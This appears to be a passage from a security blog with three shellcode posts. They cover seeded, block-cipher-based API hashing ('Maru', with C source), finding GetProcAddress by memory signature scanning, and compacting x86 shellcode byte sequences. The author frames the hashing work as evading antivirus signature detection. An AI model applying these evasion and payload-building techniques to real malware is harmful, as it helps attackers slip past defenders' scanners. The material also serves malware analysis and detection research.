Shellcode: Windows API hashing with block ciphers ( Maru Hash )

Introduction

String/Pattern Matching Algorithms are by far the most popular and easy way to detect a shellcode. The principle is simple: all codes have unique characteristics which can be used as signatures to identify in memory.

Even shellcodes with no prior analysis can contain some known value, or piece of code which at least makes it appear suspicious, and worthy of closer inspection.

The known values I’m referring to are of course API strings and hashes which have always been useful in detecting malicious code for 20+ years.

If we’re going to develop more advanced shellcodes that go undetected by modern AV solutions, we need to consider using a HLL like C or C++ along with unconventional programming that guarantees everything in a shellcode is permutable.

It’s not just the executable code that should be permutable, but the entire thing; code, data, constants, strings..everything.

What I show here today is how to create permutable API hashes using a hash function called Maru (Ma-roo), named after the Japanese cat.

Maru uses a block cipher to generate a hash of string. You don’t have to use a block cipher for this, but a cryptographic primitive can help protect the hashes against collision attacks found using Satisfiability Modulo Theories (SMT).

For more information, read Using SAT and SMT to defeat simple hashing algorithms

Also, read the section on cryptography in Quick introduction into SAT/SMT solvers and symbolic execution

CryptoSMT

**WARNING: Maru is not a cryptographic hash, and should not be used for applications where a secure hash algorithm is required.**

Signature detection

When viruses for MS-DOS started to appear 30 years ago, detection by signature was relatively simple.

In an attempt to hide code, authors used a simple XOR operation with an 8-bit value. For example, the ‘Skism Rythem Stack Virus-808‘ from 1991 used milliseconds of the current time to “encrypt” each new infection, so it would appear differently for 100 versions.

This is the entry point of that code, and its “decryption” process.

jmp    virus_start

encrypt_val db 00h

virus_start:

    call   encrypt         ; encrypt/decrypt file
    jmp    virus           ; go to start of code

encrypt:

    push   cx
    mov    bx, offset virus_code ; start encryption at data

xor_loop:
    mov    ch, [bx]        ; read current byte
    xor    ch, encrypt_val ; get encryption key
    mov    [bx], ch        ; switch bytes
    inc    bx              ; move bx up a byte
    cmp    bx,  offset virus_code + virus_size
    ; are we done with the encryption
    
    jle    xor_loop        ; no? keep going
    pop    cx
    ret

Later in the code, the virus will update ‘encrypt_val’ using the milliseconds value of the current time.

;
    mov    ah, 2ch         ; get time
    int    21h

    mov    encrypt_val, dl ; save m_seconds to encrypt val so
                           ; theres 100 mutations possible

There’s some effort to hide the body of the virus here, but the decrypter is still visible and easily detected. Moreover, a scanner can emulate the decrypter routine, exposing the body of virus in memory before performing detection by signature.

When Win32 viruses started to appear in 1997, there were no longer MS-DOS interrupts. Instead there were API functions, accessible through dynamic libraries or DLL, and this made detecting malware even easier. Any code with a large block of API strings in it, was immediately going to raise alarm bells.

Authors eventually started to use 32-bit checksums, the most popular of which was CRC32. Later, LSD-PL inspired a trend of using some basic Add-Rotate-Xor routine, like the following that appeared in their WASM package.

i3: mov   esi,[4*eax+ebx]    ; ptr to symbol name
    add   esi,edx            ; rva2va

    push  ebx      ; hash: h=((h<<5)|(h>>27))+c
    push  eax
    xor   ebx,ebx
i4: xor   eax,eax  ; hash loop
    lodsb
    rol   ebx,5
    add   ebx,eax
    cmp   eax,0
    jnz   i4 
    ror   ebx,5 
    cmp   ebx,ecx  ; hash compare
    pop   eax
    pop   ebx
    je    i5       ; same: symbol found
    inc   eax
    jmp   i3       ; different: go to the next symbol

Most legitimate code doesn’t have to resolve an API by string or hash manually through Import Address Table (IAT) or Export Address Table (EAT) and if some code does behave this way, it’s usually up to no good.

What’s funny about API hashing; It was supposed to prevent signature detection of strings. So, instead of detecting by string, AV just detected the hash of an API string, which still makes it a perfectly valid signature.

Even the shellcodes generated by many popular payload tools (BeEF, Meterpreter, Veil) all use basic hashing algorithms with no entropy or randomization. They are consistently the same, thus are just as easy to detect as any API string itself.

Of course, these packages offer the ability to encrypt payloads with a stream or block cipher like RC4 or AES. Again though, even if it will pass a simple scan by AV or IDS, a more thorough analysis using an emulator can decrypt the main code and perform pattern matching afterwards, having no problem with detection.

Plain strings problem

Ideally, an attacker would want everything obfuscated/encrypted during compilation and decrypted at run-time without using additional tools or code.

constexpr is ideal for C++ code, but for C, there’s no such feature unless of course, a compiler can be modified to encrypt all strings at compile time?

Some assemblers such as MASM and NASM support macro based compilation, but are cumbersome to work with on complex functions. (not that you couldn’t)

Z0MBiE already discussed the problem of plain strings in Data Encoding In Meta Viruses and Solving Plain Strings Problem In HLL around 2002 which did somewhat “solve” the problem, but if you look closely at the sources, there’s insufficient entropy used.

At the time, he provided a library VirStr with TASM macros that worked with Borland’s C compiler, but these do not work with mingw, msvc or clang, and the library has never been updated since.

The purpose of using entropy for hashing of API strings is obviously to increase the difficulty of detecting a payload. It’s not enough to avoid detection forever, but it’s certainly better than existing hash algorithms with no entropy at all.

Hash function constructions

We can construct new hash algorithms from block ciphers, and these offer us the potential to use unique keys, thus generating completely different API hashes every time the key changes.

However, as you will see, very few block ciphers are suitable for lightweight applications such as shellcode.

Here are 3 potential constructions to use. (there are more, but only 3 are covered)

    • Davies–Meyer

H_i=E_{m_i}(H_{i-1})\oplus H_{i-1}

Feeds each block of the message (m_i) as the key to a block cipher. Feeds the previous hash value (H_{i-1}) as the plaintext to be encrypted.

The output ciphertext is then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Matyas–Meyer–Oseas

H_i=E_g{(H_{i-1})}(m_i)\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then also XORed with the same message block (m_i) to produce the next hash value (H_i). The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

    • Miyaguchi–Preneel

H_i = E_{g(H_{i-1})}(m_i)\oplus H_{i-1}\oplus m_i

Feeds each block of the message (m_i) as the plaintext to be encrypted. The output ciphertext is then XORed with the same message block (m_i) and then also XORed with the previous hash value (H_{i-1}) to produce the next hash value (H_i).

The previous hash value (H_{i-1}) is fed as the key to the block cipher.

In the first round when there is no previous hash value it uses a constant pre-specified initial value (H_0).

Choosing a block cipher

We know signature detections require some static value, and what better static values exist than cryptographic constants?

You can of course change them, but then it might affect security of the cipher. So, it’s better to choose a cipher that doesn’t use any constants, at all.

While looking at potential block ciphers, my top 3 were based on Add-Rotate-Xor (ARX) designs.

    • Speck

Designed by the NSA, and published in 2013. Wide range of key and block sizes for different architectures. Proven to be the smallest software based block cipher available for most architectures.

Parameters for x86: 64-bit block, 128-bit key. For x86-64: 128-bit block, 256-bit key. Both implemented in 64 and 86 bytes respectively.

Here’s the x86 code.

    • Chaskey-LTS

Designed and published in 2015. Uses an Even-Mansour design with permutation function of SipHash. 128-bit keys, 128-bit blocks. Can be implemented in approx. 90 bytes using x86 assembly.

    • XTEA

eXtended Tiny Encryption Algorithm. A Feistel cipher, published in 1997 after weaknesses found in TEA. 128-bit keys, and 64-bit block. Has a known constant, 0x9E3779B9 which makes it susceptible to signature based detection. Can be implemented in approx. 80 bytes.

Speck was just the better design for lightweight applications, and can’t be easily identified by signature. (at least not from any constants)

Padding

The padding used is similar to MD4. Instead of length in bits stored as 64-bit integer, only a 32-bit integer is used. Since it will never exceed 256-bits for Maru 1 or 512 bits for Maru 2, there didn’t seem any point using a 64-bit integer.

Speck Parameters

Version 1 is suitable for 32-bit architectures while version 2 is suitable for 64-bit.

Ver. Cipher Block Size Key Size
1 Speck 64 128
2 Speck 128 256

32-bit Architectures

The following is implementation of Speck for Ver. 1

uint64_t speck64_encrypt(const void *buf, const void *key)
{
    uint32_t x0, x1;
    uint32_t k0, k1, k2, k3;
    int      i, t;
    w64_t    r;

    w64_t    *x=(w64_t*)buf;
    w128_t   *k=(w128_t*)key;
    
    // load key
    k0 = k->w[0]; k1 = k->w[1];
    k2 = k->w[2]; k3 = k->w[3];

    // load data
    x0 = x->w[0]; x1 = x->w[1];

    for (i=0; i<27; i++) {
      // encrypt block
      x0 = (ROTR32(x0, 8) + x1) ^ k0;
      x1 =  ROTL32(x1, 3) ^ x0;
      
      // create next subkey
      k1 = (ROTR32(k1, 8) + k0) ^ i;
      k0 =  ROTL32(k0, 3) ^ k1;
      
      XCHG(k3, k2);
      XCHG(k3, k1);    
    }
    // store result
    r.w[0] = x0; r.w[1] = x1;
    return r.q;    
}

64-bit architectures

The following is implementation for Ver.2

void speck128_encrypt(const void *in, const void *key, void *out)
{
    uint64_t x0, x1;
    uint64_t k0, k1, k2, k3;
    uint64_t i, t;

    w128_t   *x=(w128_t*)in;
    w128_t   *r=(w128_t*)out;
    w256_t   *k=(w256_t*)key;
    
    // load key
    k0 = k->q[0]; k1 = k->q[1];
    k2 = k->q[2]; k3 = k->q[3];

    // load data
    x0 = x->q[0]; x1 = x->q[1];

    for (i=0; i<34; i++) {
      // encrypt block
      x0 = (ROTR64(x0, 8) + x1) ^ k0;
      x1 =  ROTL64(x1, 3) ^ x0;
      
      // create next subkey
      k1 = (ROTR64(k1, 8) + k0) ^ i;
      k0 =  ROTL64(k0, 3) ^ k1;

      // rotate left 64-bits
      XCHG(k3, k2);
      XCHG(k3, k1);     
    }
    // store result
    r->q[0] = x0; r->q[1] = x1;    
}

Maru Parameters

The numbers below (excluding Ver.) represent number of bits.

Ver. CPU Construction Padding Key Message Max. Input Output
1 32 Davies-Meyer Merkle-Damgard 64 128 256 64
2 64 Davies-Meyer Merkle-Damgard 128 256 512 128

There are 2 64-bit constants used to initialize H_0 which are not really of any significance.

I just wanted something “random” without using a random number generator. Here is how to generate them using SpeedCrunch.

The 2nd value shown is used to initialize H_0 in both versions. The n-bit seed is xor’d against these values to make the hash output different.

I’ve emphasized the importance of eliminating constants which are not really permutable, and can be used as signatures, so why use them here?

You don’t have to use them. I’m only using here for illustration, but you can generate your own values to initialize H_0 or just use zero instead.

Maru 1

The only real difference between the two would be cipher parameters and local capacity for keys. We use a 32-bit seed here to initialize H_0.

uint64_t maru (const char *key, uint32_t seed)
{
    w64_t     h;
    w128_t    m;
    uint32_t  len, idx, end;

    // initialize H with seed
    h.q = MARU_INIT_H ^ seed;
    
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU_BLK_LEN-4) {
          // no, update H with E
          h.q ^= E(&h, &m);
          // zero M
          memset (m.b, 0, MARU_BLK_LEN);
        }
        // add total len in bits
        m.w[3] = (len * 8);
        idx = MARU_BLK_LEN;
        end++;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      }
      if (idx == MARU_BLK_LEN) {
        // update H with E
        h.q ^= E(&h, &m);
        idx = 0;
      }
    }  
    return h.q;
}

Maru 2

Here, we use a 64-bit seed. The 128-bit result is stored in out parameter.

void maru2(const char *key, uint64_t seed, void *out) 
{
    w128_t  h, c;
    w256_t  m;
    int     len, idx, end;

    // initialize H with seed
    h.q[0] = MARU2_INIT_B ^ seed;
    h.q[1] = MARU2_INIT_D ^ seed;
    
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU2_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU2_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU2_BLK_LEN-4) {
          // no, encrypt H
          E(&h, &m, &c);
          // update H
          h.q[0] ^= c.q[0];
          h.q[1] ^= c.q[1];          
          // zero M
          memset (m.b, 0, MARU2_BLK_LEN);
        }
        // add total len in bits
        m.w[(MARU2_BLK_LEN/4)-1] = (len * 8);
        idx = MARU2_BLK_LEN;
        end++;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      }
      if (idx == MARU2_BLK_LEN) {
        // encrypt H
        E(&h, &m, &c);
        // update H
        h.q[0] ^= c.q[0];
        h.q[1] ^= c.q[1];
        idx = 0;
      }
    }
    memcpy(out, &h, sizeof(h));    
}

Testing

Both versions performed well when tested with Robert G. Browns dieharder tool.

The tests involved setting a string buffer to all 1s and incrementing sequentially to generate hashes, similar to how one might test a PRNG.

  • Maru 1

  • Maru 2

Of course, just because the hash output passed dieharder tests, that doesn’t necessarily mean we have a good hash function, but it’s at the very least a good sign.

Example Hashes

  • Maru 1

  • Maru 2

As you can see above, once the seed value is changed, the hash output also changes.

Summary

We can construct better hashing algorithms for API strings from block ciphers. Maru isn’t intended for digital signatures or mission critical applications that requires robust collision resistant hashing functions, but it is good enough for hashing short strings like API.

Maru is really an idea about how to introduce entropy into the string hashing process, while trying to increase difficulty of string collisions.

You can see full source for Maru hash here.

About Maru the cat

Posted in assembly, programming, shellcode, windows | Tagged , , , , , | Leave a comment

Shellcode: The hunt for GetProcAddress

Introduction

Recently revealed by Alex Ionescu, future releases of Windows will include Enhanced Mitigation Experience Toolkit (EMET) built into the kernel.

As more mitigation features appear in MSVC and the Windows operating system, the difficulty of locating API to exploit memory corruption vulnerabilities increases.

It got me thinking; If both the Import Address Table (IAT) and Export Address Table (EAT) are unavailable, what other ways can we resolve GetProcAddress for a Position Independent Code (PIC) ?

Surely there must be other ways?

What you see here is just some hours work and not extensive research into obtaining GPA when the IAT and EAT are inaccessible.

I don’t know how practical this idea would be in a real world scenario, but thought it was worth a quick post which might encourage others to find some alternatives.

Signature Detection

Every algorithm used to detect malware can be repurposed to detect arbitrary code including that of GetProcAddress.

Detection of malicious code can range from simple searching of strings, constants (including crypto) or sequences of code bytes to more advanced methods like emulation and statistical analysis.

Locating GetProcAddress by signature is trivial because it’s the only API that will return the error code: STATUS_ORDINAL_NOT_FOUND

From Windows NT up to Windows 10, there’s a high probability simply searching either kernel32.dll or kernelbase.dll for a function with this constant is enough to locate the entry point of GetProcAddress.

Search algorithm

Some pseudocode to describe search pattern:

for each DLL in PEB
  for each executable section in DLL
    scan forward in memory for STATUS_ORDINAL_NOT_FOUND
    if constant found
      scan backward in memory for prolog bytes
        if bytes found
          break
        end if
    end if
  end for
end for

Simple enough in theory and for 32-bit legacy mode is effective.

However, it’s ineffective if GetProcAddress uses function chunking thus will not work for some DLL (specifically 64-bit versions).

On Windows 7, the location of our constant in kernelbase.dll appears inside a chunk of code.

Negating 0x3FFFFEC8 gives us 0xC0000138

On Windows 10, the location of constant is within the same GetProcAddress code thus entrypoint can be easily located via simple search.

To work with Win7, I would suggest a Length Disassembler Engine (LDE) in addition to emulating the relative jumps until you land in GetProcAddress again, but there are no LDE for 64-bit I know which would operate independently of memory. Maybe one isn’t needed?

Since we’re searching the sections of kernel32.dll or kernelbase.dll, let’s examine the PEs section header structure and what members we’re interested in.

typedef struct _IMAGE_SECTION_HEADER {
  BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
  • Misc.VirtualSize

The total size of the section when loaded into memory, in bytes. If this value is greater than the SizeOfRawData member, the section is filled with zeroes. This field is valid only for executable images and should be set to 0 for object files.

  • VirtualAddress

The address of the first byte of the section when loaded into memory, relative to the image base. For object files, this is the address of the first byte before relocation is applied.

  • Characteristics

The characteristics of the image. Since we’re looking for executable code, we can test this value for IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE

Once we find an executable section, we perform a simple search for our signature, which in this case would be 4-byte sequence: 0x38, 0x01, 0x00, 0xC0

If found, we presume we’re in GetProcAddress code so we scan back in memory to find the prolog bytes which for 32-bit will be 0x55, 0x8B, 0xEC and 0x48, 0x89, 0x5C, 0x24, 0x08 for 64-bit.

// 32-bit prolog
"\x55"             /* push ebp           */
"\x8b\xec"         /* mov ebp, esp       */

Even though most 32-bit API since XP SP2 have mov edi, edi before prolog which is intended for hotpatching, we can in most cases skip it without any consequences.

// 64-bit prolog
"\x48\x89\x5c\x24\x08" /* mov [rsp+0x8], rbx */

Another potential way to find the entry point on 64-bit once we’ve found the signature is to look for padding added by the compiler. (some compilers differ in what padding is used)

Functions are aligned on a 16-byte boundary; padding is used before and after GetProcAddress.

On Windows 7, 0x90 is used, which is the x86 opcode for No operation (NOP)

On Windows 10, 0xCC is used, which is the opcode for a software interrupt (INT3)

This may be useful for searching with a different algorithm which is the only reason I mention it.

C code

For each DLL in the Process Environment Block (PEB)
Find either kernel32.dll or kernelbase.dll

LPVOID get_gpa (VOID)
{
  PPEB                  peb;
  PPEB_LDR_DATA         ldr;
  PLDR_DATA_TABLE_ENTRY dte;
  LPVOID                api_adr=NULL;
  DWORD                 i, h;
  BYTE                  c;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PPEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && api_adr == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  { 
    // is this kernel32.dll or kernelbase.dll?
    for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      c = dte->BaseDllName.Buffer[i];
      h += (c | 0x20);
      h = ROTR32(h, 13);
    }
    if (h != 0xB1FC7F66 && h!= 0x22901A8D) continue;
    
    api_adr = scan_img(dte->DllBase); 
    
    if (api_adr != NULL) {
      printf ("\nGetProcAddress: %p", api_adr);
      printf ("\nGetProcAddress: %p\n", 
        GetProcAddress(dte->DllBase, "GetProcAddress"));      
    }
  }
  return api_adr;
}

For each executable section of this DLL

LPVOID scan_img (LPVOID base)
{
  PIMAGE_DOS_HEADER     dos;
  PIMAGE_NT_HEADERS     nt; 
  PIMAGE_SECTION_HEADER sec;
  BOOL                  is32;  
  PBYTE                 pRawData;
  DWORD                 i, len;
  LPVOID                gpa=NULL;

  dos  = (PIMAGE_DOS_HEADER)base;  
  nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);  
  sec  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
         nt->FileHeader.SizeOfOptionalHeader);  
  is32 = nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386;
  len  = nt->FileHeader.NumberOfSections;  
  
  // for each section
  for (i=0; i<len && gpa == NULL; i++) {    
    // is it executable?
    if (sec[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
      pRawData = RVA2VA (PBYTE, base, sec[i].VirtualAddress);
      
      gpa = scan_section (pRawData, sec[i].Misc.VirtualSize, is32);
    }
  }
  return gpa;
}

Find the signature and scan backwards for the prolog bytes.

LPVOID scan_section (PBYTE memory, DWORD len, BOOL is32)
{
  DWORD  i, j, plen;
  LPVOID ofs=NULL;
  
   // 4-byte signature 
  BYTE   sig[] = { 0x38, 0x01, 0x00, 0xC0 };
  
  // 3-byte prolog for 32-bit   
  BYTE   x32[] = { 0x55, 0x8B, 0xEC };
  
  // 4-byte prolog for 64-bit  
  BYTE   x64[] = { 0x48, 0x89, 0x5C, 0x24 };
  PBYTE  prolog, p;
  
  p      = memory;
  plen   = is32 ? sizeof(x32) : sizeof(x64);
  prolog = is32 ? x32 : x64;

  if (len <= sizeof(sig)) return NULL;
  
  // subtract size of signature 
  // so we don't cause an exception
  len -= sizeof(sig);
  
  for (i=0; i<len; i++) {
    // compare signature with current position
    if ((memcmp(sig, &p[i], sizeof(sig))==0)) {
      // try scanning backwards for prolog bytes
      for (j=i; j>=0; j--) {
        // found prolog bytes?
        if (memcmp(prolog, &p[j], plen)==0) {
          // return address
          ofs = (LPVOID)&p[j];
          break;
        }
      }
    }
    if (ofs != NULL) break;
  }  
  return ofs;
}

Summary

Does it work? For majority of 32-bit mode OS, it works fine because STATUS_ORDINAL_NOT_FOUND is within the prolog and epilog of GetProcAddress code. Where it doesn’t work is on Windows 7 64-bit because the constant is outside.

  • Windows 7 32-bit
  • (good!)

The 1st address is off by 2-bytes, but that’s the MOV EDI, EDI instruction used for hotpatching and can be safely skipped over.

  • Windows 7 64-bit
  • (bad..)

  • Windows 10 64-bit
  • (good!)

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments

Shellcode: x86 optimizations part 1

Introduction

What follows are a number of basic ways to compact shellcodes. In a follow up post, I’ll discuss a few ways to obfuscate them which might be useful for evading signature detection algorithms.

Some of the examples illustrated here can also be used for boot loaders, PE protectors/compressors, coding demos or something else that requires compact code.

The little tricks shown here are derived from various sources and I mention a number of people at the end of post in acknowledgements.

I did plan on discussing a little about the x86 architecture, but there’s already a lot of information out there and I assume you’re already familiar with it.

We’ll cover 4 things here:

  1. Declaration and initialization of variables / registers
  2. Testing value of register / variable
  3. Conditional jumps / Control flow
  4. Character conversions

Initializing a register

Each CPU register is like a variable itself.

The x86 CPU in legacy mode has 8 General Purpose Registers (GPR) each capable of storing 32-bits or 4-bytes of information. Of course, we don’t normally use the Stack Pointer (ESP) for anything other than stack management, so we really only have 7 GPR to use. 4 of these provide access to 8 and 16-bit words.

A very common operation is to set a variable (or in this case register) to zero.
What you see below are a number of ways to do it. Some are better than others and really just depends on the situation.

// 8-bits
        "\x30\xc0"             /* xor al, al        */
        
        "\x28\xc0"             /* sub al, al        */
        
        "\xb0\x00"             /* mov al, 0x0       */
        
        "\x24\x00"             /* and al, 0x0       */
        
        // 16-bits
        "\x66\x31\xc0"         /* xor ax, ax        */
        
        "\x66\x29\xc0"         /* sub ax, ax        */
        
        "\x66\xb8\x00\x00"     /* mov ax, 0x0       */
        
        "\x66\x83\xe0\x00"     /* and ax, 0x0       */
        
        "\x66\x6a\x00"         /* push 0x0          */
        "\x66\x58"             /* pop ax            */
    
        // 32-bits
        "\xb8\x00\x00\x00\x00" /* mov   eax, 0      */
   
        "\x31\xc0"             /* xor   eax, eax    */
    
        "\x29\xc0"             /* sub   eax, eax    */
    
        "\x6a\x00"             /* push  0           */
        "\x58"                 /* pop   eax         */
    
        "\x83\xe0\x00"         /* and   eax, 0      */
    
        "\x6b\xc0\x00"         /* imul  eax, eax, 0 */
    
        "\xf8"                 /* clc               */
        "\x19\xc0"             /* sbb   eax, eax    */
    
        "\x6a\xff"             /* push  -1          */
        "\x58"                 /* pop   eax         */
        "\x40"                 /* inc   eax         */
    
        "\x31\xd2"             /* xor   edx, edx    */
        "\x92"                 /* xchg  eax, edx    */

        (when we know eax is < 0x80000000)
        "\x99"                 /* cdq               */
        "\x92"                 /* xchg  eax, edx    */

        "\xb8\xff\xff\xff\xff" /* mov   eax, -1     */
        "\x40"                 /* inc   eax         */

        "\x83\xc8\xff"         /* or    eax, -1     */
        "\x40"                 /* inc   eax         */

        "\x6a\xff"             /* push  -1          */
        "\x58"                 /* pop   eax         */
        "\x40"                 /* inc   eax         */

        (64-bit mode)
        "\x48\x31\xc0"         /* xor rax, rax      */

It’s not a complete list of ways to initialize this particular register, but the operators used: MOV, XOR, SUB, AND can all set other variables to zero in a similar way.

One thing worth mentioning about the last instruction XOR RAX, RAX is that it’s not necessary to perform the operation on RAX. You can save a byte by using XOR EAX, EAX because the result is zero extended to 64-bits.

Initializing to -1

"\xb8\xff\xff\xff\xff" /* mov eax, 0xffffffff */

"\x6a\xff"             /* push 0xffffffff     */
"\x58"                 /* pop eax             */

"\x83\xc8\xff"         /* or eax, 0xffffffff  */

"\xf9"                 /* stc                 */
"\x19\xc0"             /* sbb eax, eax        */

"\xb0\xff"             /* mov al, 0xff        */
"\x0f\xbe\xc0"         /* movsx eax, al       */

"\x31\xc0"             /* xor eax, eax        */
"\x48"                 /* dec eax             */

"\x31\xc0"             /* xor eax, eax        */
"\x83\xf0\xff"         /* xor eax, 0xffffffff */

"\x31\xc0"             /* xor eax, eax        */
"\xf7\xd0"             /* not eax             */

Moving a register into another.

// moving register or immediate value into register
"\x83\xcb\xff"         /* or ebx, 0xffffffff  */
"\x21\xc3"             /* and ebx, eax        */

"\x31\xdb"             /* xor ebx, ebx        */
"\x09\xc3"             /* or ebx, eax         */

"\x31\xdb"             /* xor ebx, ebx        */
"\x01\xc3"             /* add ebx, eax        */

"\x31\xdb"             /* xor ebx, ebx        */
"\x31\xc3"             /* xor ebx, eax        */

"\x50"                 /* push eax            */
"\x5b"                 /* pop ebx             */

Initializing to immediate values is also very common, but something not always well executed by those writing a shellcode.

Let’s say you need 1 in EAX/RAX which under Linux would be the EXIT system call.

//
    "\x48\xc7\xc0\x01\x00\x00\x00"   /* mov rax, 0x1        */

    "\x48\x31\xc0"                   /* xor rax, rax        */
    "\x48\xff\xc0"                   /* inc rax             */

    "\x31\xc0"                       /* xor eax, eax        */
    "\xfe\xc0"                       /* inc al              */

    "\x6a\x01"                       /* push 0x1            */
    "\x58"                           /* pop rax             */

    "\x83\xc8\xff"                   /* or eax, 0xffffffff  */
    "\xf7\xd8"                       /* neg eax             */

There’s more than 1 reason to use the PUSH/POP combination. It’s more compact than any of the others, but also compatible with both 32 and 64-bit mode whereas some of the others are not.

In general, if the immediate value is between -128 and +127, use a PUSH/POP combination.

For values above this, the opcodes are larger.

Imagine an egg hunter shellcode where you want to attempt reading memory. This normally involves setting register to 4096 which represents a page table boundary.

I’ve often seen the following code used.

// 32-bit
    "\x31\xd2"             /* xor edx, edx    */
    "\x66\x81\xca\xff\x0f" /* or dx, 0xfff    */
    "\x42"                 /* inc edx         */

// 64-bit    
    "\x31\xd2"             /* xor edx, edx    */
    "\x66\x81\xca\xff\x0f" /* or dx, 0xfff    */
    "\x48\xff\xc2"         /* inc rdx         */

Here are some other ways, but with the last two being the most compact.

//
    "\x66\x68\x00\x10"     /* push 0x1000     */
    "\x66\x5a"             /* pop dx          */
    "\x0f\xb7\xd2"         /* movzx edx, dx   */

    "\x68\x00\x10\x00\x00" /* push 0x1000     */
    "\x5a"                 /* pop edx         */

    "\xba\x00\x10\x00\x00" /* mov edx, 0x1000 */

    "\x31\xd2"             /* xor edx, edx    */
    "\xb6\x10"             /* mov dh, 0x10    */

    "\x6a\x10"             /* push 0x10       */
    "\x5a"                 /* pop edx         */
    "\x86\xf2"             /* xchg dl, dh     */

When pushing -1 or 1 on stack, I’ve often seen code where a register is incremented or decremented.

Take this code in block_shell.asm

Pushing 1 on stack

"\x46"                 /* inc esi             */
"\x56"                 /* push esi            */
"\x4e"                 /* dec esi             */

Which is perfectly fine, but you could just as well push 1 on stack and save a byte.

"\x6a\x01"             /* push 0x1            */

The same operation is near end of code

"\x4e"                 /* dec esi             */
"\x56"                 /* push esi            */
"\x46"                 /* inc esi             */

We can save a byte.

"\x6a\xff"             /* push 0xffffffff     */

Okay, I’m not pointing out all the ways you can optimize metasploit code 🙂 ..just using real world examples where immediate values like this should be pushed on stack when it’s only 1 of those values you require.

In the 64-bit version, consider the following.

The number of bytes generated compared with 2 for an immediate push.

"\x49\xff\xc0"         /* inc r8                  */
"\x41\x50"             /* push r8                 */
"\x49\xff\xc8"         /* dec r8                  */

Allocating/Initializing Memory

Compilers will use ADD, SUB or in the past ENTER(Pascal/Ada) to allocate memory on the stack.

The unconventional way is to use PUSH/PUSHFD allocating 4 or more bytes. Even PUSHAD can allocate 32-bytes of storage in a single byte.

If using PUSHAD, you can adjust the stack later using ADD, SUB or LEA if you didn’t want to trash GPR with POPAD. Here are a few examples of allocating 32 bytes of space for something.

//
    "\xc8\x20\x00\x00"     /* enter 0x20, 0x0     */
    "\xc9"                 /* leave               */

    "\x55"                 /* push ebp            */
    "\x89\xe5"             /* mov ebp, esp        */
    "\x83\xec\x20"         /* sub esp, 0x20       */
    "\xc9"                 /* leave               */

    "\x83\xec\x20"         /* sub esp, 0x20       */
    "\x83\xc4\x20"         /* add esp, 0x20       */

    "\x60"                 /* pushad              */
    "\x61"                 /* popad               */

Here, we allocate 8 bytes and initialize to zero.

// FPU

    "\x83\xec\x08"         /* sub esp, 0x08       */
    "\x89\xe7"             /* mov edi, esp        */
    "\xd9\xee"             /* fldz                */
    "\xdf\x3f"             /* fistp qword [edi]   */

// MOV

    "\x83\xec\x08"         /* sub esp, 0x08       */
    "\x89\xe7"             /* mov edi, esp        */
    "\x31\xc0"             /* xor eax, eax        */
    "\x89\x07"             /* mov [edi], eax      */
    "\x89\x47\x04"         /* mov [edi+0x4], eax  */

// STOSD

    "\x83\xec\x08"         /* sub esp, 0x08       */
    "\x89\xe7"             /* mov edi, esp        */
    "\x31\xc0"             /* xor eax, eax        */
    "\x57"                 /* push edi            */
    "\xab"                 /* stosd               */
    "\xab"                 /* stosd               */
    "\x5f"                 /* pop edi             */

// PUSH

    "\x31\xc0"             /* xor eax, eax        */
    "\x50"                 /* push eax            */
    "\x50"                 /* push eax            */
    "\x89\xe7"             /* mov edi, esp        */

// For 64-bit mode, we only need 1 push

    "\x31\xc0"             /* xor eax, eax        */
    "\x50"                 /* push rax            */
    "\x54"                 /* push rsp            */
    "\x5f"                 /* pop rdi             */

Here’s how I’d allocate 4096 byte buffer.

// allocate 4096 bytes on stack and initialize to zero
"\x31\xc0"             /* xor eax, eax        */
"\x31\xc9"             /* xor ecx, ecx        */
"\xb5\x10"             /* mov ch, 0x10        */
"\x29\xcc"             /* sub esp, ecx        */
"\x89\xe7"             /* mov edi, esp        */
"\xf3\xaa"             /* rep stosb           */

The above code may cause an exception on Windows (unsure about UNIX-based systems) because of a stack limit imposed upon each application.

The default maximum stack size on Windows is 1MB, and on Linux it’s at least 4MB. Windows pre-allocates about 64KB of stack pages while Linux allocates 128KB.

When you allocate a large block of stack memory that exceeds what’s already available, you need to ensure the page is accessible. Compilers like MSVC and MINGW perform this under the hood so you don’t have to worry about it, but for assembly programming, you need to perform the stack probe yourself.

